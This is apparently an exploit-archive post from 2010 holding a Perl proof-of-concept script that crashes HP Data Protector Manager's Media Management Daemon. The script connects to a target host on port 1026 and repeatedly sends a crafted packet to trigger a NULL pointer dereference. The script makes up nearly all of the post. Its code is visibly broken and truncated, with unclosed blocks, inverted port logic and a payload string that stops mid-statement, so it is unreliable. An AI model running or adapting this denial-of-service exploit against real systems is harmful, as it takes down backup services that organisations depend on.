HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service Vulnerability

2010-12-01 11:15:13


# =================================
# HP Data Protector Manager A.06.11
# =================================
# Bug: NULL Pointer Dereference Remote Denial of Service Vulnerability
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 30/11/2010
# Author: Pepelux - pepelux[AT]enye-sec[DOT]com
# http://www.enye-sec.org - http://www.pepelux.org
# Service: mmd.exe (Media Management Daemon)
# Vulnerable file: \Program Files\OmniBack\bin\MSVCR71.dll
# MSVCR71.dll:7c350428 mov ax,[edx] caused access violation
# when attempting to read from 0x00000000
# Tested on Windows XP SP2

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
print "Usage: perl $0 <host> [port]\n";
print "\tdefault port = 1026\n\n";
exit 1;

$port = 1026 if ($ARGV[0]);

my $buf = "\x00\x00\x00\x43\xfe\xff\x00\x32\x00\x36\x00\x37\x00\x00\x41\x41".

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

while(1) {
print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";


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